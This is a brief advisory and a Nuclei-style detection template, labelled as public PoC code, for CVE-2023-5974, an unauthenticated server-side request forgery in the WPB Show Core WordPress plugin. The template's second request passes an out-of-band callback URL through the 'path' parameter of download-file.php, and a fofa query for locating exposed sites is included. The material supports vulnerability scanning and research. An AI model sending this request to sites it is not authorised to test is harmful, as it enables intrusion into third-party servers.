The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
PoC代码[已公开]
id: CVE-2023-5974
info:
name: WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: |
The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
reference:
- https://wpscan.com/vulnerability/c0136057-f420-4fe7-a147-ecbec7e7a9b5
- https://nvd.nist.gov/vuln/detail/CVE-2023-5974
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5974
cwe-id: CWE-918
epss-score: 0.83548
epss-percentile: 0.99238
cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: wpb-show-core-project
product: wpb-show-core
fofa-query: body="wp-content/plugins/wpb-show-core/"
tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "wpb-show-core"
internal: true
- raw:
- |
GET /wp-content/plugins/wpb-show-core/download-file.php?path=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a00483046022100f57423f4bb07fa4cd54bb9bc7f89b3c7b463c48a416555188a89b638acfc0f8302210094a6b30a1bb61b1bfdb1ddfd40d48c518d21e117dde140a500dff24cc4f68667:922c64590222798bb761d5b6d8e72950